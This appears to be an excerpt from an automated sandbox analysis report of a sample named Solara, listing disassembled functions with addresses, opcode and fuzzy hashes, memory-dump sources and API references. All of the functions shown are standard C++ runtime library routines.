API String ID:
Opcode ID: d1579354323a2032c450c2b0def3b65917fd77837d0b62c1e27d7c9d7c2f97dd
Instruction ID: fc2b17c3789a51a59d1c4e06f8e891513fdbe5f0d299eabf36b09bb80b47580f
Opcode Fuzzy Hash: d1579354323a2032c450c2b0def3b65917fd77837d0b62c1e27d7c9d7c2f97dd
Instruction Fuzzy Hash: 32F0A032A25230EBCF16C74CC44AA9873B8EB04B21F124056E405E7240C6B0DE40C7D0

Function 00C977B0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a2e1441591584284e775d8d8a74b331168ce047e15d51dafe5c8aad37a401b
Instruction ID: 1b03f822f17a77a99db77f65fc2421a9fd026fa78a880a05c922fd42b02192c1
Opcode Fuzzy Hash: 63a2e1441591584284e775d8d8a74b331168ce047e15d51dafe5c8aad37a401b
Instruction Fuzzy Hash: 91E06D35611344EFCF06CF58C554A89B3F9EB48745F204064E409C7650DB34DE40DB10

Function 00C9776D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497193a136cc42c9d9b011ef4c691ac2506b8ae57a9f859ae54924483227b7b7
Instruction ID: 6726ff233cf42673bd5c70fb86da729cd3a7a57acdf2b37dccd931e74b27016c
Opcode Fuzzy Hash: 497193a136cc42c9d9b011ef4c691ac2506b8ae57a9f859ae54924483227b7b7
Instruction Fuzzy Hash: 23E06535611304EFDF0ACBA8C598E89B3F9EB48744F2040A8E409C7750EB35DE80DB10

Function 00CCA670 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b117bfbea6400a99ddbf75ff449b5b70eac8b1f266ab9053fcde73136b554d
Instruction ID: 0057cf3667f10266d5b6785f04005e9803a65e6ac1b15eee677565dbea5d3bd8
Opcode Fuzzy Hash: e7b117bfbea6400a99ddbf75ff449b5b70eac8b1f266ab9053fcde73136b554d
Instruction Fuzzy Hash: 5BD0C918A081446796286B39DDAAE3BBABCC747244F006028E847A7291E604D8188AED

Function 00C9784E Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044660733e792c3be6391586c2b353a98afdf559fe92a3e8e5c286b6302ecaa5
Instruction ID: 4e094f90945142dd13efef61b2d6f0b0fef769c7c2c050d5cec78a5e0fbeaed8
Opcode Fuzzy Hash: 044660733e792c3be6391586c2b353a98afdf559fe92a3e8e5c286b6302ecaa5
Instruction Fuzzy Hash: 87E0E235616248EFCB04DBA8C549A8AB7F8FB48B58F1148A4E406D7251D738EE80EA44

Function 00C22559 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ebe3e8d0dd78a262c0d66e6fbe758b31883a2a4b3bde31f41cd11239fa94728
Instruction ID: ad4ca910c7ec0dba4d358f745ba92760fc9e02bf50268d52edfc34bef5bfe682
Opcode Fuzzy Hash: 0ebe3e8d0dd78a262c0d66e6fbe758b31883a2a4b3bde31f41cd11239fa94728
Instruction Fuzzy Hash: 4FD0923A641A109FC210CF09E440981F7B5FB996307168056E90493720C330FC12CAE0

Function 00C42078 Relevance: 24.4, APIs: 16, Instructions: 438COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4207F
int.LIBCPMT ref: 00C42272
int.LIBCPMT ref: 00C422C8
int.LIBCPMT ref: 00C4230D
int.LIBCPMT ref: 00C42350
int.LIBCPMT ref: 00C423BC
int.LIBCPMT ref: 00C4243D

Part of subcall function 00C4171A: __Getctype.LIBCPMT ref: 00C41729

Part of subcall function 00C3C999: __EH_prolog3.LIBCMT ref: 00C3C9A0
Part of subcall function 00C3C999: std::_Lockit::_Lockit.LIBCPMT ref: 00C3C9AA
Part of subcall function 00C3C999: int.LIBCPMT ref: 00C3C9C1
Part of subcall function 00C3C999: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CA1B

Part of subcall function 00C3CAC3: __EH_prolog3.LIBCMT ref: 00C3CACA
Part of subcall function 00C3CAC3: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CAD4
Part of subcall function 00C3CAC3: int.LIBCPMT ref: 00C3CAEB
Part of subcall function 00C3CAC3: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CB45

Part of subcall function 00C3CC82: __EH_prolog3.LIBCMT ref: 00C3CC89
Part of subcall function 00C3CC82: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CC93
Part of subcall function 00C3CC82: int.LIBCPMT ref: 00C3CCAA
Part of subcall function 00C3CC82: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD04

Part of subcall function 00C3CBED: __EH_prolog3.LIBCMT ref: 00C3CBF4
Part of subcall function 00C3CBED: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CBFE
Part of subcall function 00C3CBED: int.LIBCPMT ref: 00C3CC15
Part of subcall function 00C3CBED: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CC6F

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

numpunct.LIBCPMT ref: 00C42464

Part of subcall function 00C3D9B3: __EH_prolog3.LIBCMT ref: 00C3D9BA

Part of subcall function 00C3D1BF: __EH_prolog3.LIBCMT ref: 00C3D1C6
Part of subcall function 00C3D1BF: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D1D0
Part of subcall function 00C3D1BF: int.LIBCPMT ref: 00C3D1E7
Part of subcall function 00C3D1BF: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D241

Part of subcall function 00C3D2E9: __EH_prolog3.LIBCMT ref: 00C3D2F0
Part of subcall function 00C3D2E9: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D2FA
Part of subcall function 00C3D2E9: int.LIBCPMT ref: 00C3D311
Part of subcall function 00C3D2E9: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D36B

Part of subcall function 00C2A7E6: Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Part of subcall function 00C3C61B: __EH_prolog3.LIBCMT ref: 00C3C622
Part of subcall function 00C3C61B: std::_Lockit::_Lockit.LIBCPMT ref: 00C3C62C
Part of subcall function 00C3C61B: int.LIBCPMT ref: 00C3C643
Part of subcall function 00C3C61B: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C69D

int.LIBCPMT ref: 00C4248C
int.LIBCPMT ref: 00C4209C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C42102
int.LIBCPMT ref: 00C42147
int.LIBCPMT ref: 00C4218A
int.LIBCPMT ref: 00C4220E
__Getcoll.LIBCPMT ref: 00C42234
int.LIBCPMT ref: 00C424F0

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypenumpunct
String ID:
API String ID: 2694696949-0
Opcode ID: 48c46b235cc415da14f074f7e757bab5ed3b66a83d528964b2e978a084909c00
Instruction ID: 0d7f6d69cd870e9f73b15a3744740658111320c3ad5b024baa6ac82cd147de0f
Opcode Fuzzy Hash: 48c46b235cc415da14f074f7e757bab5ed3b66a83d528964b2e978a084909c00
Instruction Fuzzy Hash: 52D138B1C04325ABDB216F759C03A7FBBB9FF81760F148019F95567242DB708E40A7A6

Function 00C4254A Relevance: 24.4, APIs: 16, Instructions: 438COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C42551
int.LIBCPMT ref: 00C42744
int.LIBCPMT ref: 00C4279A
int.LIBCPMT ref: 00C427DF
int.LIBCPMT ref: 00C42822
int.LIBCPMT ref: 00C4288E
int.LIBCPMT ref: 00C4290F

Part of subcall function 00C21CEA: __Getctype.LIBCPMT ref: 00C21CF9

Part of subcall function 00C3CA2E: __EH_prolog3.LIBCMT ref: 00C3CA35
Part of subcall function 00C3CA2E: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CA3F
Part of subcall function 00C3CA2E: int.LIBCPMT ref: 00C3CA56
Part of subcall function 00C3CA2E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CAB0

Part of subcall function 00C3CB58: __EH_prolog3.LIBCMT ref: 00C3CB5F
Part of subcall function 00C3CB58: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CB69
Part of subcall function 00C3CB58: int.LIBCPMT ref: 00C3CB80
Part of subcall function 00C3CB58: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CBDA

Part of subcall function 00C3CDAC: __EH_prolog3.LIBCMT ref: 00C3CDB3
Part of subcall function 00C3CDAC: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CDBD
Part of subcall function 00C3CDAC: int.LIBCPMT ref: 00C3CDD4
Part of subcall function 00C3CDAC: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CE2E

Part of subcall function 00C3CD17: __EH_prolog3.LIBCMT ref: 00C3CD1E
Part of subcall function 00C3CD17: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CD28
Part of subcall function 00C3CD17: int.LIBCPMT ref: 00C3CD3F
Part of subcall function 00C3CD17: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD99

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

numpunct.LIBCPMT ref: 00C42936

Part of subcall function 00C3D9E6: __EH_prolog3.LIBCMT ref: 00C3D9ED

Part of subcall function 00C3D254: __EH_prolog3.LIBCMT ref: 00C3D25B
Part of subcall function 00C3D254: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D265
Part of subcall function 00C3D254: int.LIBCPMT ref: 00C3D27C
Part of subcall function 00C3D254: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D2D6

Part of subcall function 00C3D37E: __EH_prolog3.LIBCMT ref: 00C3D385
Part of subcall function 00C3D37E: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D38F
Part of subcall function 00C3D37E: int.LIBCPMT ref: 00C3D3A6
Part of subcall function 00C3D37E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D400

Part of subcall function 00C2A7E6: Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Part of subcall function 00C269A7: __EH_prolog3.LIBCMT ref: 00C269AE
Part of subcall function 00C269A7: std::_Lockit::_Lockit.LIBCPMT ref: 00C269B8
Part of subcall function 00C269A7: int.LIBCPMT ref: 00C269CF
Part of subcall function 00C269A7: std::_Lockit::~_Lockit.LIBCPMT ref: 00C26A29

int.LIBCPMT ref: 00C4295E
int.LIBCPMT ref: 00C4256E

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C425D4
int.LIBCPMT ref: 00C42619
int.LIBCPMT ref: 00C4265C
int.LIBCPMT ref: 00C426E0
__Getcoll.LIBCPMT ref: 00C42706
int.LIBCPMT ref: 00C429C2

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypenumpunct
String ID:
API String ID: 2694696949-0
Opcode ID: 8818eb3305791ec97dcd499a6e0c33307da73b86a3989fb47ee98e244ff205b4
Instruction ID: 44275323d9eeb700612d73e9d56d66089c38be6109354902accc08690bdbeaa8
Opcode Fuzzy Hash: 8818eb3305791ec97dcd499a6e0c33307da73b86a3989fb47ee98e244ff205b4
Instruction Fuzzy Hash: F2D139B2C04325ABCB206F759C03A7FBAB5FF91760F15441DF95567282EB308A40A7A6

Function 00C59768 Relevance: 19.8, APIs: 13, Instructions: 332COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C59831
DName::operator+.LIBCMT ref: 00C5986E
DName::DName.LIBVCRUNTIME ref: 00C59882
DName::operator+.LIBCMT ref: 00C59891
DName::operator+.LIBCMT ref: 00C5991F
DName::DName.LIBVCRUNTIME ref: 00C59947
DName::operator+.LIBCMT ref: 00C59955
DName::operator+.LIBCMT ref: 00C5998F
DName::operator+.LIBCMT ref: 00C599D0
UnDecorator::getReturnType.LIBCMT ref: 00C59A00
operator+.LIBVCRUNTIME ref: 00C59B02

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID:
API String ID: 2932655852-0
Opcode ID: 3980284e21e6a22b3871d03bc1d0a42b0c65abd346bd1c16fbf83e98177c729a
Instruction ID: 83b49d69b1047b1daedf49040d33d2bd746ff341470934df71dd1c3a5834117d
Opcode Fuzzy Hash: 3980284e21e6a22b3871d03bc1d0a42b0c65abd346bd1c16fbf83e98177c729a
Instruction Fuzzy Hash: 43C1947D900208EFCB14DFA4D9959ED77B8EB08301F54419EF906A7291EB309AC9DB68

Function 00C5AD63 Relevance: 19.8, APIs: 13, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5ADCE
DName::operator+.LIBCMT ref: 00C5AF11

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

DName::operator+.LIBCMT ref: 00C5AEBC
DName::operator+.LIBCMT ref: 00C5AF5D
DName::operator+.LIBCMT ref: 00C5AF6C
DName::operator+.LIBCMT ref: 00C5B098
DName::operator=.LIBVCRUNTIME ref: 00C5B0D8
DName::DName.LIBVCRUNTIME ref: 00C5B0E2
DName::operator+.LIBCMT ref: 00C5B0FF
DName::operator+.LIBCMT ref: 00C5B10B

Part of subcall function 00C5C625: Replicator::operator[].LIBCMT ref: 00C5C662

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
String ID:
API String ID: 1043660730-0
Opcode ID: e008ba0d85b916961d63c490cb613e1e140c392ea9f4d29cb6ac93179fd24f43
Instruction ID: ee25f09ab1bd3e64e68fccb68aee8c41e51fe2d57cd9b66f01e433052b4414ab
Opcode Fuzzy Hash: e008ba0d85b916961d63c490cb613e1e140c392ea9f4d29cb6ac93179fd24f43
Instruction Fuzzy Hash: 72C1B3B9900304AFDB24DFA4C845BEEBBF4AF08306F14415DE955A7281EB759ACDCB18

Function 00C57ED3 Relevance: 16.9, APIs: 11, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00C57F46
shared_ptr.LIBCMT ref: 00C57F8E
shared_ptr.LIBCMT ref: 00C57FAD
operator+.LIBVCRUNTIME ref: 00C580DB
DName::operator=.LIBVCRUNTIME ref: 00C580ED
shared_ptr.LIBCMT ref: 00C58332
DName::operator+.LIBCMT ref: 00C58374
operator+.LIBVCRUNTIME ref: 00C583BA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 92b8e7efc0cd7e2a15cdc6190909af047d08af60c19ee8debf66db86ab25ae08
Instruction ID: 48d42b219b308dcb677d59dd94915fad53c13f70d08613687c38862848f74fe4
Opcode Fuzzy Hash: 92b8e7efc0cd7e2a15cdc6190909af047d08af60c19ee8debf66db86ab25ae08
Instruction Fuzzy Hash: C8E18DB9C0420A9BCF04DFD5C498AFEBBB4AB05706F50821AD922B7250DB74578DCF99

Function 00C4C00E Relevance: 16.8, APIs: 11, Instructions: 277COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4C015

Part of subcall function 00C4AC99: __EH_prolog3_GS.LIBCMT ref: 00C4ACA0
Part of subcall function 00C4AC99: __Getcoll.LIBCPMT ref: 00C4AD04
Part of subcall function 00C4AC99: std::_Locinfo::~_Locinfo.LIBCPMT ref: 00C4AD20

__Getcoll.LIBCPMT ref: 00C4C064

Part of subcall function 00C4A7EA: __EH_prolog3.LIBCMT ref: 00C4A7F1
Part of subcall function 00C4A7EA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4A7FB
Part of subcall function 00C4A7EA: int.LIBCPMT ref: 00C4A812
Part of subcall function 00C4A7EA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A86C

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

int.LIBCPMT ref: 00C4C03E

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C4C0A2
int.LIBCPMT ref: 00C4C0F8
int.LIBCPMT ref: 00C4C13D
int.LIBCPMT ref: 00C4C180
int.LIBCPMT ref: 00C4C1EC
int.LIBCPMT ref: 00C4C26D
numpunct.LIBCPMT ref: 00C4C294
int.LIBCPMT ref: 00C4C2BC

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Getcoll$H_prolog3_LocinfoLocinfo::~_numpunct
String ID:
API String ID: 4001742795-0
Opcode ID: 100ff75ce2e9bcc71af7eafeb9edb016db00d07ca07dba4c0af6ef39136a42f3
Instruction ID: 105d9efde2d9c7974740fae7ff2533fc8b8e990a32a5b26c69273563fbbf9a7d
Opcode Fuzzy Hash: 100ff75ce2e9bcc71af7eafeb9edb016db00d07ca07dba4c0af6ef39136a42f3
Instruction Fuzzy Hash: DA9138B1C06211ABDB60AF759C4267F7BB9FF81720F10841DF855A7253DB708E00A7A6

Function 00C5C625 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 185COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 00C5C662

Strings

@, xrefs: 00C5C7CE
generic-type-, xrefs: 00C5C6E8
template-parameter-, xrefs: 00C5C6C1

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3676697650-1320211309
Opcode ID: 45c4bd1fda92ced4dcbd27628d05d34f49d75336707cfea62f1d60d1b4e3e90d
Instruction ID: afd90417860e2722ecfde1dcdd5284c405f4bd57004a43c77dbb38de5b1ad7bd
Opcode Fuzzy Hash: 45c4bd1fda92ced4dcbd27628d05d34f49d75336707cfea62f1d60d1b4e3e90d
Instruction Fuzzy Hash: AC61DA79D003059FDB14DFA5DC85BEEB7B8AF1C301F144019EA11A7291DB749A89CFA8

Function 00C5B86A Relevance: 15.3, APIs: 10, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5B940
UnDecorator::getSignedDimension.LIBCMT ref: 00C5B94B
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA37
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA54
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA71
DName::operator+.LIBCMT ref: 00C5BA86
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BAA0
swprintf.LIBCMT ref: 00C5BB1A
DName::operator+.LIBCMT ref: 00C5BB75

Part of subcall function 00C578F8: DName::DName.LIBVCRUNTIME ref: 00C57956

